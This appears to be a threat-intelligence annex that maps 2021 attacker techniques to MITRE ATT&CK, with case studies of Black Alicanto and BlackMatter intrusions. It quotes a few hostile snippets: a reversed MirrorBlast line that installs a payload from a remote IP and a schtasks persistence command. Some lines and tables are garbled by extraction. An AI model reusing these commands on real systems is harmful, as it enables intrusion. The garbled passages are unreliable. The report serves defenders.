# Cyber Threats 2021: A Year in Retrospect ### Annex ----- # Contents ##### 04 Tools, techniques, and procedures ##### 22 Trends in Detection ##### 30 CVE Spotlight ##### 37 Conclusion 38 Endnotes ----- # Introduction #### This Technical Annex supplements our Cyber Threats 2021: A Year in Retrospect annual Threat Intelligence report, which examines the overarching and thematic cyber threat trends of 2021. With this Technical Annex, we provide more detailed information about the Tools, Techniques, and Procedures (TTPs) that we observed threat actors using throughout 2021, as well as of high-profile and high-impact vulnerabilities disclosed during the year, mapping our findings across the MITRE ATT&CK framework for consistency and clarity. We present further intelligence related to these TTPs and vulnerabilities, including incident response case studies, to give defenders real-world context. We also share some of the detection engineering logic we applied when faced with threats such as 0-days, and some of the challenges that we encountered in the process. Our analysis is based on our in-house intelligence datasets on cyber attacks and targeting from a variety of threat actors, intelligence gleaned from our incident response engagements around the world, and our managed threat hunting services, as well as publicly available information. Ultimately, this annex is designed to be actionable for defenders, whether by building out an organisation’s threat model, or mapping the current state of its defences against the threat landscape, or to implement new detection ideas. Valid credentials for victim networks, either obtained through phishing campaigns or through dark web markets, were one of the main initial access vectors that we observed in 2021 across threat actors of all motivations and degrees of sophistication. Our research into credential marketplaces showed that they play a key Access-as-a-Service role for criminal actors, with credentials exposed through the simple leaking of compromised data, auctions, or private sales to individual buyers. Execution and Evasion remain the most prevalent categories that we observed techniques for at the endpoint level on victim networks. Execution Flow Hijacking remains a popular technique among threat actors to achieve code execution while evading detection; during post-exploitation, we observed threat actors favouring .NET, with PowerShell remaining extremely popular but subject to greater scrutiny by defenders. Evolutions in Cobalt Strike evasion also enable this offensive security tool to persist as a staple in many threat actor arsenals, from cyber criminal groups to espionage-motivated advanced persistent threats (APTs). The increased reliance of many businesses on cloud services for day-to-day operations makes them an attractive option for threat actors to evade traditional security controls: where an attacker is hosting their malware command and control on the same cloud service as their victim uses for legitimate business, that malware activity will be harder to separate from legitimate activity. Throughout 2021, we continued to observe threat actors abusing legitimate services, such as file storage and sharing platforms, or collaboration and communication tools, and hiding amid benign activity. Finally, along with existing known vulnerabilities, the high volume of 0-day vulnerabilities disclosed in 2021 enabled threat actors of all motivations to perform targeted attacks and mass-scale exploitation attempts alike. However, although vulnerabilities in widespread products such as Microsoft Exchange and Log4j made for a very large attack surface for threat actors to capitalise upon, we found defence in depth and security hygiene practices made a tangible positive impact in enabling detection and response to exploitation attempts. ----- # Tools, techniques, # and procedures ----- The MITRE ATT&CK framework is a matrix that maps attack methodologies to each stage of an intrusion. It allows for a comprehensive and nuanced “step-by-step” understanding of a threat actor’s tools, techniques, and procedures (TTPs). In this section, we describe the techniques that we have observed being most frequently used in 2021 by threat actors. We note that such observations may vary across different organisations, as each has a unique threat profile and access to unique combinations of data, however, these techniques are some of the many that appear to be consistently used by threat actors of all motivations across every region. ## MITRE ATT&CK techniques The following tables highlight the most common techniques we saw used in 2021. |Technique Initial Access T1566.001|Description Phishing: Spearphishing Attachment|Explanation Phishing remains one of the most pervasive threat vectors we observe throughout our analysis, incident response, and security operations work. It is used by threat actors of all motivations and can take many forms, whether it be a malicious spam (malspam) operation – wherein threat actors send large volumes of emails with malicious links or attachments, with the purpose of netting as many successful interactions with their payload as possible – or through more targeted spearphishing attacks. In this particular sub-category of the MITRE ATT&CK framework, there is a focus on a malicious file being appended to the phishing email and requiring the user to interact with it. The email itself will contain a social engineering element: for example some form of encouraging language, a request, an alert conveying a sense of urgency, or a proposal seemingly too good to pass up. A characteristic example of this is North Korea-based Black Artemis (aka Lazarus Group)'s continued use of lure documents themed around job specifications1 for roles at high-profile companies in the defence and engineering sectors, which are sent to targets often after the threat actor establishes a rapport by posing as a recruiter on social media such as LinkedIn. While spearphishing attachments often tend to be malicious documents or executables, other threat actors may adopt more complex delivery and installation chains. For example, Russia-based Blue Dev 52 would send targets a malicious ISO image attached to an email; the ISO file would contain a LNK file meant to load and run a malicious dynamic link library (DLL) on victim systems.| |---|---|---| |T1190|Exploit Public-Facing Application|External-facing applications are an attractive target to threat actors of all motivations and at varying levels of sophistication. In 2021, we observed large volumes of activity targeting vulnerable external-facing applications, particularly surrounding releases of high-profile, remotely exploitable 0-day vulnerabilities.3,4 Both ProxyLogon and Log4Shell, among others, were initially exploited by advanced persistent threats, and then quickly adopted for mass scanning5 and exploitation by threat actors of all kinds, ranging from ransomware operators to cryptojacking campaigns. We observed China-based and Iran-based threat actors heavily performing mass scans for vulnerabilities in exposed interfaces. Red Djinn6 (aka BlackTech, Mobwork, Palmerworm) has been targeting vulnerable routers as well as indiscriminately scanning for vulnerable Oracle and VMWare appliances. Yellow Dev 247 (aka Nemesis Kitten) scanned for and exploited internet facing appliances, including Fortinet appliances and Microsoft Exchange servers, to then deploy Mimikatz and the FRPC proxying tool.| ----- |Execution T1204.002|User Execution: Malicious File|The most commonly observed technique across our analysis this year, the use of malicious files, is likely to remain a staple for threat actors of all motivations as a technique for initial entry. There is, however, nuance to this technique, as threat actors find novel ways to make use of malicious files. We continue to see social engineering play an important part in the success of this technique. For example, PwC responded to an incident involving a threat actor we track as White Dev 898 which made use of a trojanised Zoom installer that purported to be legitimate. We also tracked a Blue Dev 5 campaign9 involving phishing emails with malicious HTML attachments containing short JavaScript payloads; these would upload at least the User-Agent and external IP address of the victim, as well as the filepath of the attachment, to a Firebase instance controlled by the threat actor to fingerprint compromised machines and identify targets of interest.| |---|---|---| |T1204.002|User Execution: Malicious File|PowerShell is an incredibly powerful command line tool native to the Windows Operating System. This characteristic affords threat actors the opportunity to rely on a legitimate tool, installed on most systems, to execute malicious commands and scripts. PowerShell can be used in a variety of ways throughout multiple phases of a threat actor’s campaign, and is still widely popular due to its versatility and to the success threat actors have found in using it, despite an increase in defenders’ ability to detect and block malicious PowerShell execution. For example, White Dev 8510 has been targeting entities in the Middle East with macro-weaponised documents that deliver PowerShell scripts to victims. Black Banshee11 (aka Kimsuky, Velvet Chollima) has similarly used obfuscated PowerShell commands hidden in malicious macros to download payloads from a remote staging server and execute them.| **Figure 1 - A Black Banshee macro containing lightly-obfuscated PowerShell** **Figure 2 - The same Black Banshee macro containing PowerShell, after deobfuscation** ----- |T1059.003|Command and Scripting Interpreter: Windows Command Shell|Much like PowerShell, the Windows Command Line offers threat actors versatility in terms of both functionality and defence evasion. Threat actors can make specific use of it to prevent immediate detection: for example by pairing this technique with obfuscation mechanisms or batch files. PwC’s analysis of an open directory likely related to an Iran-based threat actor12 revealed the use of a batch script to query malicious C2 domains in what was likely an attempt to download next stage payloads onto the victim’s system. Yellow Liderc13 (aka Tortoiseshell, TA456) has also used malicious macros containing over forty hardcoded command-line commands to fingerprint a victim’s network ahead of post-exploitation and lateral movement activities. PwC has also observed ransomware operators, such as White Dev 72 (aka Babuk)14, using the command line to allow for the malware’s configuration and functionality to be customised by the affiliate using it.| |---|---|---| |T1059.005|Command and Scripting Interpreter: Visual Basic|Visual Basic (VB) is primarily used by threat actors during the initial access or execution phase, and is most commonly observed in malicious Microsoft Office document macros. VB as a language is relatively flexible, and some of its features allow anti-analysis and defence evasion via tactics such as VBA stomping. VB macros are prevalent across the threat landscape. A common technique involves using VB scripts to concatenate, decode, and run payloads – for example, White Austaras’s (TA505) MirrorBlast15 campaign exploited VB’s capabilities in Excel documents to concatenate and execute the content of several cells, which would ultimately form a one-line JavaScript downloader for further payloads. Black Alicanto16 (aka Dangerous Password, LeeryTurtle, CryptoMimic, CryptoCore, Operation SnatchCrypto) has also been using a series of subsequent VBScript backdoors collectively known as CageyChameleon and CabbageRAT.| **Figure 3 - White Austaras’ MirrorBlast malicious documents contain macros that concatenates cells, and then** **executes their contents - a JavaScript which has been reversed with each word split using a *** string.** ))”with(new ActiveXObject(“WindowsInstaller.Installer })”246].[185.225.19//:InstallProduct(“hxxp;2=UILevel{ ----- |T1204.001 Persistence T1547.001 Privilege Escalation T1053.005|User Execution: Malicious Link Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder Scheduled Task/ Job: Scheduled Task|It is not just malicious files that threat actors relied on in 2021, but malicious links as well. This technique is in many ways a response to the spotlight put on malicious documents by security researchers, with several threat actors having success with domain spoofing leading to the victim downloading a malicious payload via the link. This technique makes it relatively easy to create a malicious domain that appears legitimate to the user through the use of domain spoofing or mirroring technique (i.e, micr0soft[.]com, or mail-mailbox-microsoft[.]com). These domains can be used to host the payload intended for the victim that may otherwise have been deemed as suspicious when merely attached to an email. Just as with malicious attachments, the use of malicious links often involves a measure of social engineering by the threat actor to persuade victims into opening the link. Ransomware operators have been known to employ this technique in emails, including White Khione (aka Luna Spider, GOLD SWATHMORE) during its IcedID campaigns.17 In April 2021, IcedID emails sent to victims contained a URL leading to a Google site and prompting the user to visit it in order to view allegedly stolen photographs. The link led to a ZIP archive download, which contained a JavaScript file designed to download and execute IcedID. Both espionage and criminally motivated threat actors have the need to remain persistent on a victim’s system, in order to ensure that their campaigns are not terminated by the victim turning off their machine, or even removing the malware’s running instance. The use of Run Registry Keys or the Startup Folder allows a threat actor to both hide and house their malware in a place on disk (be it a Registry Key or folder), such that the malware would always run when the machine starts up or the user logs in. This technique is common, likely due to the ease of implementation, with threat actors not having to rely on the writing of extra code or scripts for effective persistence. However, despite its prominence, one novel use of this technique PwC’s threat intelligence team observed was by Iran-based threat actor Yellow Nix18 (aka Static Kitten, MERCURY, MuddyWater) which, through the use of several scripts, loaded further malicious scripts that would only run once the victim had restarted their system, and not before. Among the many ways for threat actors to achieve persistence on a victim’s system, scheduled tasks remain very common. These can be implemented through a variety of methods, such as the schtask command line, or through a call to a native Windows API function. Scheduled tasks are also configurable, providing threat actors flexibility in choosing the conditions of their malware’s permanence on victim systems. However, another use of this technique was observed by a threat actor PwC tracks as Red Dev 1419, which used scheduled tasks alongside executables, using the scheduled task’s functionality as a way to execute the binaries. This is a non-standard use of this technique, which is usually only used for persistence once the malware has been executed.| |---|---|---| It is likely that Red Dev 14 injected code into AppLaunch.exe files that enabled it to gain persistence via a service under .Services\MicrosoftFrameworkLaunchUtility\REGISTRY\MACHINE\SYSTEM\ControlSet001 The threat actor also set up the following scheduled task set to run at the system’s startup: schtasks /create /tn Microsoft\Windows\Wmi /tr “cmd /c \”start rundll32 ”“ C:\Windows\WmiAd.dll,func\”” /sc onstart /ru Th W iAd dll fil li i DLL b d th d b f b kd d FUNRUN i ----- |Defence Evasion T1221|Template Injection|Threat actors have been known to abuse Microsoft Office document’s remote templates functionality by embedding URL links to their own infrastructure, allowing for a malicious payload to be fetched and executed while a document displays to the user. While this is not a new technique, we continued to observe several threat actors relying on it throughout 2021. It is frequently employed by Russia-based threat actor Blue Odin20 (aka CloudAtlas), which was observed in 2021 making use of a spoofed COVID-19 form purporting to be from a Western government, containing two embedded remote UNC paths to a remote C2 server. This same technique was also used by Blue Odin to target victims in post-Soviet states through spoofed official-looking documents, but heavily guarding its payloads to prevent researchers from observing follow-on infection stages. Blue Otso21 is also known for its heavy use of malicious documents involving template injection. Russia-based threat actors are not the only ones adopting this technique, however, for example, North Korea-based Black Dev 222 (aka Operation Gold Hunting, Operation SnatchCrypto) has consistently used Office documents fetching a remote template with malicious macros in its targeting of cryptocurrency businesses and venture capital firms.| |---|---|---| |T1027|Obfuscated Files or Information|There are multiple reasons why a threat actor may choose to encode or encrypt their malware, but most of these reasons centre around protecting their payload from being discovered and analysed. One of the most sophisticated code obfuscations that we observed this year was implemented by China-based threat actor Red Dev 10 (aka Earth Lusca), which created a bespoke packing mechanism for its ShadowPad payloads. We call this mechanism Scatterbee23, and have covered it in more detail in a public blog.24 For example in 2021, we also observed activity with tentative links to Scarlet Ioke (a.k.a Ocean Lotus, APT32) involving Shikata Ga Nai- encoded CobaltStrike payloads.25| |T1036|Masquerading|Masquerading is a common technique often used by threat actors to blend into the victim’s environment and mimic legitimate activity. This can be implemented in multiple ways; for example, we observed Android malware attributed to Grey Karkadann (aka Arid Viper, APT-C-23) with the ability to mimic legitimate Google applications once installed.26 It not only had the ability to mimic these in name and icon, but also opened the legitimate application for the victim when requested.| |T1070.004|Indicator Removal on Host: File Deletion|A common method of defence evasion that PwC has observed being used by multiple threat-actors in 2021 is performing file deletion on compromised systems in order to remove forensic artefacts. This could involve files that were used during the initial access or post-exploitation phases, or files staged and subsequently exfiltrated to a threat actor-controlled server. Some Black Artemis macros would initially decode multiple malicious payloads and drop them into a victim’s %TEMP% folder, before executing them and deleting the evidence of their initial installation and presence on disk. PwC’s research into ObliqueRAT27 this year also evidenced how Pakistan-based Green Havildar (aka APT36, Transparent Tribe, Gorgon Group) was using the File Deletion technique to delete traces of file exfiltration, as the malware had the capability to upload a compressed archive file to the C2, and subsequently delete it.| **T1112** **Modify Registry** The Registry hive offers multiple opportunities to threat actors: from evading defences, to achieving privilege escalation, persistence, execution, and information discovery. Ransomware operator White Apep provided Darkside & BlackMatter payloads to whom?[28] with a known UAC bypass technique that involved modifying the Registry. This would then allow the malware to execute with higher privileges. While this is by no means a new technique, certain malware families also continue to check for specific registry keys in order to avoid executing in a virtual machine; in 2021, for example, we observed Black Banshee’s BravePrince[29] checking for VMWare registry keys before continuing execution. ----- |Discovery T1083|File and Directory Discovery|This technique is leveraged by a vast majority of malware, with varying use cases. Ransomware, for example, will look to discover files and directories as part of its encryption functionality, but also potentially as part of its discovery phase for future exfiltration. We observed an affiliate of the BlackMatter operation30 doing exactly this during an incident response case, moving laterally through the victim’s network marking sensitive files for exfiltration at a later phase. Ransomware has also often looked for files to be excluded during its encryption process; our reporting on Grief31 ransomware shows several specific file extensions that will be skipped over when encrypting the system in order to maintain enough functionality for the victim to navigate to the threat actor’s leak site. Malware deployed by espionage-motivated threat actors has typically used this technique for information collection purposes, such as Orange Athos’s (aka Patchwork) BADNEWS backdoor.32 But threat actors may also decide to specifically try and identify files of interest: for example, Black Banshee’s BravePrince RAT33 would check a victim’s Recent folder for any .lnk, Word (.doc and .docx), or Hangul Word Processor (HWP) files and copy them to a staging folder ahead of exfiltration.| |---|---|---| |T1057|Process Discovery|Threat actors can have multiple uses for querying the running processes on a system, such as an anti-analysis conditional check on the existence of specific processes (such as checking for a specific security research analysis tool), or as a malware persistence check to ensure the currently running implant is the only instance of itself running on the victim system. PwC observed activity that we assess with realistic probability to be related to Vietnam-based Scarlet Ioke that made use of this technique34, querying all processes and threads to ensure the malware was the only instance of itself running.| |T1033|System Owner/ User Discovery|Threat actors frequently attempt to identify a system’s owner or user, sometimes for victim fingerprinting, often for the purposes of eventual privilege escalation or lateral movement. There are multiple avenues for gleaning this information, such as native APIs, legitimate operating system command line functionality, and certain environment variables (e.g., querying %USERNAME%). This technique can also be used for anti-analysis purposes and as an execution guardrail: an example of this usage includes the campaigns of China-based threat actor Red Kelpie35 (aka APT41), whose Motnug loader made use of a specific flag that could ensure the infected victim was running with system privileges, and stop executing otherwise.| |T1082|System Information Discovery|Most malware performs system information discovery, though the purposes may vary. In the majority of cases, system information is collected as part of the victim fingerprinting and Discovery stage of an intrusion. It is also information that can be used by the threat actor for further payload deployment (for example after discovering the version of Windows that is running on the machine). PwC observed Iran-based Yellow Liderc36 using this technique extensively during the initial attack phase, running an extensive list of commands to obtain information about the victim’s system, network, and users. This was likely done to determine the victim’s suitability for further exploitation. Threat actors may also use malicious scripts to profile victim systems: for example, Black Alicanto’s third-stage VBScript payload known as Cabbage RAT-C gathers extensive data about the victim host, from basic system information to network configuration, and even running processes and their command line data.37| ----- |Collection T1074.001|Data Staged: Local Data Staging|Not all threat actors might stage data locally on the victim machine ahead of exfiltration. In some cases, the threat actor might configure a backdoor or script to automatically upload files of interest to the C2, or avoid this kind of technique in order to minimise the risk of getting identified. From a detection and hunting perspective, the specific file path and filenames patterns that a threat actor might use when staging data can be a useful data point when searching a device or network for evidence of exfiltration, or even to find more malware samples that exhibit similar behaviour when staging collected data. For example, the updated version of the Black Banshee implant BravePrince38 contained a module with the functionality to stage victim files in a custom folder within the victim's %APPDATA% directory, which would later be compressed, encrypted, and then exfiltrated by the backdoor over email. Similarly, Red Menshen’s C++ information- gathering tool GetInfo39 would also stage data locally, for later exfiltration by the implant that had deployed GetInfo to start with.| |---|---|---| |T1113 Command and Control T1071.001|Screen Capture Application Layer Protocol: Web Protocols|Screen capture is usually a function within a backdoor, allowing for live image capture of a victim's screen, and usually done on a timed basis. ‘PwC has observed this functionality typically used as part of a wider toolset within espionage-motivated arsenals. CotXRat malware, also known as KeyBoy, has these capabilities, as the threat actor is able to grab a screen capture of the victim's machine through a numeric command code.40 ShadowPad malware also includes modules dedicated to screen capture, though not all threat actors with access to the backdoor may choose to use them. Finally, Red Menshen’s GetInfo41 also has the ability to take screenshots and capture video from victims' webcam. The majority of the networking protocols PwC observed being used by threat actors and malware during 2021 were made up of HTTP (over port 80) or HTTPs (over port 443). We assess this is highly likely due to the ease with which malware can be configured to these protocols, as well as the fact that the malicious traffic is more likely to blend in with benign network activity. Most malware that we observed in 2021 uses this technique for its command and control (C2) configuration, such as China-based threat actor Red Djinn's FlagPro and SpiderRAT malware; or Black Artemis's PaintJob malware 42 Slightly more sophisticated uses of HTTP or HTTPS involve the usage of APIs; for example, we saw Black Shoggoth's (aka APT37, Reaper) BlueLight payload ROKRAT43 using the Microsoft Graph API for C2.| |T1132.001|Data Encoding: Standard Encoding|When exfiltrating information from a victim system, or downloading data to it, threat actors will often look to perform some form of basic encoding. In some cases, this might seek to prevent the activity from being picked up by endpoint solutions, and in others, simply to compress the size of data being exfiltrated. PwC has observed this trend continue across all categories of threat actors in 2021 and at different levels of sophistication. One example is threat actor ReconHellCat, which we track as Blue Dev 6, and for which we have found loose links to Russia-based threat actor Blue Athena (a.k.a. Sofacy).45 ReconHellCat has made use of a custom base64 encoding mechanism in a campaign targeting a Western government’s Foreign Office, wherein several non-standard base-64 characters were made to replace other characters in the alphabet.| **Figure 4 - ReconHellCat using a custom base64 encoding mechanism with non-standard characters** ----- |Collection T1041|Exfiltration Over C2 Channel|Threat actors have a need to move the sensitive information they’ve collected from the victim’s machine to their own server. One of the most popular methods for achieving this aim is to send it over a dedicated command and control (C2) channel; a technique which can take a variety of forms. This trend has continued in 2021, although there are other novel implementations of this technique that threat actors of all motivations have begun to adopt, including the use of legitimate exfiltration tools, or cloud-based services. For example, ransomware operator White Onibi (aka Conti) was observed instructing affiliates to make use of the file sharing service mega[.]io for C2 exfiltration alongside the tool RClone.45 Threat actors can also abuse legitimate cloud platforms, such as Dropbox, for both C2 and exfiltration, as we observed with a RAT known as BoxCaon46 used to target Afghanistan earlier this year, and with Black Shoggoth’s ROKRAT malware.47| |---|---|---| ----- ## New techniques The MITRE ATT&CK framework is constantly being updated with new attacker techniques, allowing for all elements of cyber security to better understand and categorise the tactics and techniques being leveraged by threat actors. Below we outline some of the new additions to the MITRE ATT&CK framework in 2021, alongside examples of these techniques where we observed threat actors adopting them. **Technique** **Description** **Explanation** **Resource** **Development** **T1608** **Stage** This entire new set of techniques added to MITRE ATT&CK in 2021 revolves around **Capabilities** the threat actor staging certain resources that can be used during the campaign. This technique is in specific reference to capabilities being staged on adversarycontrolled networks that are then accessible to the victim, through either a malicious link, or downloaded onto the victim’s machine through ingress tool transfer. This technique highlights a section of threat actor preparation that has the potential to widely impact how we think about defending against malicious campaigns. For example, understanding particular domain naming patterns or domain registrars certain threat actors have a habit of using, can allow for the recognition, and potential mitigation, of a threat actor’s future campaign. Defenders should take into account possible avenues that threat actors might take for payload staging in their defensive strategy, including legitimate services such as Content Delivery Networks (CDNs) or cloud services. Most threat actor activity PwC observed across 2021 has made use of these Stage Capabilities subtechniques, such as Russia-based threat actor Blue Odin’s remote template techniques seen being leveraged against Belarus[48], China-based Red Djinn’s collection of exploits and vulnerability scans left staged on an open directory[49], or China-based threat actor Red Dev 3’s (aka DeepCliff, RedAlpha) fake login portals for credential theft.[50] **Figure 5 - A Red Dev 3 credential phishing page imitating a Google login page** |Technique Resource Development|Description|Explanation This entire new set of techniques added to MITRE ATT&CK in 2021 revolves around the threat actor staging certain resources that can be used during the campaign. This technique is in specific reference to capabilities being staged on adversary- controlled networks that are then accessible to the victim, through either a malicious link, or downloaded onto the victim’s machine through ingress tool transfer. This technique highlights a section of threat actor preparation that has the potential to widely impact how we think about defending against malicious campaigns. For example, understanding particular domain naming patterns or domain registrars certain threat actors have a habit of using, can allow for the recognition, and potential mitigation, of a threat actor’s future campaign. Defenders should take into account possible avenues that threat actors might take for payload staging in their defensive strategy, including legitimate services such as Content Delivery Networks (CDNs) or cloud services. Most threat actor activity PwC observed across 2021 has made use of these Stage Capabilities subtechniques, such as Russia-based threat actor Blue Odin’s remote template techniques seen being leveraged against Belarus48, China-based Red Djinn’s collection of exploits and vulnerability scans left staged on an open directory49, or China-based threat actor Red Dev 3’s (aka DeepCliff, RedAlpha) fake login portals for credential theft.50| |---|---|---| |T1608|Stage Capabilities|| ----- |Defence Evasion|Col2|This technique involves a threat actor either loading or injecting code into the memory of an already running process. We observed it being adopted by numerous different threat actors and malware families over the years. A recent example includes activity by India-based threat actor Orange Kala51 (aka Donot), which was observed injecting downloaded shellcode into an already running DLL. The reason this technique remains common is likely because it is difficult to detect, and by loading malicious code into a benign or legitimate running process, a threat actor can mask their functionality from standard intrusion detection systems.| |---|---|---| |T1620|Reflective Code Loading|| |T1036.007 Discovery|Masquerading: Double File Extension|A double file extension (e.g., pdf.lnk) allows for threat actors to mask the nature of their payloads due to the fact files will in most circumstances render the first file extension provided. For example, threat actors such as Black Alicanto52 and Grey Karkadann53 commonly use double file extensions as a masquerading technique on victims. The use of system language discovery is a technique we continued to observe over the last year – particularly amongst ransomware threat actors such as White Ursia (aka Sodinokibi, REvil), White Apep, and White Austaras – preventing the ransomware from detonating and encrypting systems belonging to organisations that operate in specific areas (typically including Russia and post-Soviet States).54| |T1614.001|System Location Discovery: System Language Discovery|| |T1016.001|System Network Configuration Discovery: Internet Connection Discovery|Threat actors have been known to test for internet functionality before deploying their malware’s command and control (C2) capabilities. This is often done to ensure that the malware is able to connect back to a threat actor-controlled server, and to avoid isolated analysis systems or malware sandboxes. Connection tests typically involve resolving a common internet domain that would not stand out among a victim organisation’s traffic. For example, we observed Iran-based threat Yellow Liderc55 making use of the ping functionality alongside several domains that would experience a large degree of traffic (e.g., Yahoo, Google, Github), testing for a responsive ping. Crime-motivated actors such as White Horoja (aka Qakbot) were also observed using this technique, with QakBot56 malware also assessing the victim’s download speed for future payloads.| **Figure 6 - A Yellow Liderc macro executing commands fingerprinting the victim environment and checking connectivity** **by pinging common domains** ----- ## Mapping intrusions to MITRE ATT&CK While the previous section listed the techniques that we observed being most frequently used in 2021 by threat actors and offered examples of their individual usage, this one offers an overview of how several of those techniques may be concatenated as part of intrusion chains we observed. ##### Black Alicanto Analysing an attack across all its individual phases, from preparation all the way to exfiltration or impact, can help defenders identify actions that might be detectable on the network, and consider how their current defences would fare against such intrusion activity. |Col1|Col2| |---|---| ||| ||| |/|Col2| |---|---| ||| ||| |t|Col2| |---|---| ||L| ||| ----- 1. The threat actor sends a phishing email to the target, with a RAR archive attached. a. Phishing: Spearphishing Attachment https://attack.mitre.org/techniques/T1566/001/ 2. The user is provided with instructions in the email to open the RAR archive, and execute the lure document inside using the password provided. a. User Execution: Malicious File https://attack.mitre.org/techniques/T1204/002/ 3. The threat actor would either use a lure document with macros, or a LNK file with a double extension. a. Command and Scripting Interpreter: Visual Basic https://attack.mitre.org/techniques/T1059/005/ b. Masquerading: Double File Extension https://attack.mitre.org/techniques/T1036/007/ 4. The document macros/LNK is used to download the Cabbage RAT-A from a bit.ly shortened URL onto the victim’s system. a. Stage Capabilities: Link Target - https://attack.mitre. org/techniques/T1608/005/ b. Stage Capabilities: Upload Malware https://attack.mitre.org/techniques/T1608/001/ 5. Cabbage RAT-A is a loader, and has the functionality of loading Cabbage RAT-B into memory, while also placing an LNK of itself in startup for persistence: a. Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder https://attack.mitre.org/techniques/T1547/001/ b. Reflective Code Loading https://attack.mitre.org/techniques/T1620/ 6. CabbageRAT-B is a fingerprinting malware, written in Visual Basic, and has the functionality to collect the victim’s system, network, and user information, sending it back to the C2 used to download Cabbage RAT-A over an HTTP POST request. This starts a two-way communication with the C2, which allows for new code to be downloaded by Cabbage RAT-B - including a malware known as Cabbage RAT-C - which will be initially encoded. a. Command and Scripting Interpreter: Visual Basic https://attack.mitre.org/techniques/T1059/005/ b. System Information Discovery https://attack.mitre.org/techniques/T1082/ c. System Network Connections Discovery d. System Owner/User Discovery https://attack.mitre.org/techniques/T1033/ e. System Time Discovery https://attack.mitre.org/techniques/T1124/ f. Application Layer Protocol: Web Protocols https://attack.mitre.org/techniques/T1071/001/ g. Data Encoding: Standard Encoding https://attack.mitre.org/techniques/T1132/001/ h. Exfiltration Over C2 Channel https://attack.mitre.org/techniques/T1041/ 7. Cabbage RAT-C is also a human-operated ransomware written in Visual Basic, capable of being given commands from a hardcoded C2 server that provide the malware with a multitude of functionality, including: file upload, download, and deletion capabilities, executing code snippets passed to it (this can be encoded), and setting current directories. a. Command and Scripting Interpreter: Visual Basic https://attack.mitre.org/techniques/T1059/005/ b. Data Encoding: Standard Encoding https://attack.mitre.org/techniques/T1132/001/ c. Indicator Removal on Host: File Deletion https://attack.mitre.org/techniques/T1070/004/ d. File and Directory Discovery https://attack.mitre.org/techniques/T1083/ e. Data from Local System https://attack.mitre.org/techniques/T1005/ f. Exfiltration Over C2 Channel https://attack.mitre.org/techniques/T1041/ 8. One of the files observed being downloaded by CabbageRAT-C is a payload known as msoRAT which, alongside having its own file upload and download capabilities, also has unique privilege escalation and exfiltration methods, as well as process injection and credential stealing functionality. a. Data Encoding: Standard Encoding https://attack.mitre.org/techniques/T1132/001/ b. Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol https://attack.mitre.org/techniques/T1048/003/ c. Credentials from Password Stores: Credentials from Web Browsers https://attack.mitre.org/techniques/T1555/003/ d. Archive Collected Data: Archive via Utility ----- ##### White Apep **Figure 8 - Steps of a White Apep intrusion chain deploying BlackMatter ransomware** Rubeus SharpHound PowerPick BlackMatter ramsomware Detonated after sensitive document Victim network |Col1|Col2|Col3|B| |---|---|---|---| ||||r| ||||| Dark Web forum Obtain credentials of victim pre-attack Stagings Server Cobalt Strike Credential stealing tools BlackMatter Victim RDS Victims server Lateral Admin affiliate server movement account Sensitive documents WinSCP Threat actor C2 |Col1|Col2| |---|---| ||| ||| 1. White Apep uses the dark web to purchase credentials for compromised corporate accounts of organisations based in the US, UK, Canada, or Australia, specifying that the organisation’s revenue must exceed US$1m, and have 500 to 15,000 hosts. Once bought, these credentials are given to the affiliate threat actor who is to conduct the operation on the victim organisation. a. Gather Victim Org Information: Identify Roles https://attack.mitre.org/techniques/T1591/004/ b. Gather Victim Host Information: Software https://attack.mitre.org/techniques/T1592/002/ c. Gather Victim Identity Information: Credentials https://attack.mitre.org/techniques/T1589/001/ 2. The affiliate performs active scanning to find a public facing Remote Desktop Server (RDS) of the victim, which they can plug the credentials into, gaining access to the victim’s system. a. Valid Accounts: Local Accounts https://attack.mitre.org/techniques/T1078/003/ b. Active Scanning: Vulnerability Scanning https://attack.mitre.org/techniques/T1595/002/ 3. Through the RDS server, the threat actor is able to move t th b tl i t lli C b lt St ik a. Stage Capabilities: Upload Malware https://attack.mitre.org/techniques/T1608/001/ b. Exploitation of Remote Services https://attack.mitre.org/techniques/T1210/ c. Remote Services: Remote Desktop Protocol https://attack.mitre.org/techniques/T1021/001/ 4. The Cobalt Strike payload is used to install additional network scanning tools, such as Rubeus, PowerPick, and SharpHound. It is also later used to download the ransomware payload for encryption of the victim’s network. a. Network Share Discovery https://attack.mitre.org/techniques/T1135/ b. System Network Connections Discovery https://attack.mitre.org/techniques/T1049/ c. Ingress Tool Transfer https://attack.mitre.org/techniques/T1105/ 5. Using Cobalt Strike and the extra commodity tools downloaded, the threat actor is able to conduct lateral movement onto further victim servers. a. Lateral Tool Transfer https://attack mitre org/techniques/T1570/ ----- 6. Other tools are also downloaded through this Cobalt Strike payload, including Brute Force and Kerber, which are used in tandem with a DCSync attack to obtain credentials for an account with Administrative privileges. a. Account Discovery: Domain Account https://attack.mitre.org/techniques/T1087/002/ b. Domain Trust Discovery https://attack.mitre.org/techniques/T1482/ c. Group Policy Discovery https://attack.mitre.org/techniques/T1615/ d. Permission Groups Discovery: Domain Groups https://attack.mitre.org/techniques/T1069/002/ e. Brute Force: Credential Stuffing https://attack.mitre.org/techniques/T1110/004/ f. OS Credential Dumping: DCSync https://attack.mitre.org/techniques/T1003/006/ g. Valid Accounts: Domain Accounts https://attack.mitre.org/techniques/T1078/002/ 7. With Administrative privileges now secure, the threat actor is able to scan the network for sensitive files, exfiltrating them via the WinSCP file transfer tool. a. Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol https://attack.mitre.org/techniques/T1048/003/ b. Data from Local System https://attack.mitre.org/techniques/T1005/ c. Data from Network Shared Drive https://attack.mitre.org/techniques/T1039/ 8. The BlackMatter ransomware is placed on every available endpoint in the network, and subsequently detonated. The malware itself has privilege escalation functionality should it need it, but will mainly be used to encrypt most files on the infected device. a. Abuse Elevation Control Mechanism: Bypass User Account Control https://attack.mitre.org/techniques/T1548/002/ b. Obfuscated Files or Information: Software Packing https://attack.mitre.org/techniques/T1027/002/ c. Obfuscated Files or Information: Compile After Delivery https://attack.mitre.org/techniques/T1027/004/ d. Exploitation for Privilege Escalation https://attack.mitre.org/techniques/T1068/ e Data Encrypted for Impact ----- ## Back to BEC A particular type of incident involving social engineering and cyber-enabled fraud whose prevalence and impact should not be underestimated is Business Email Compromise (BEC). BEC involves a threat actor hijacking or closely imitating a legitimate email account, or impersonating some entity or person, in order to socially engineer individuals, mainly to convince them to make payments to a threat actor-controlled 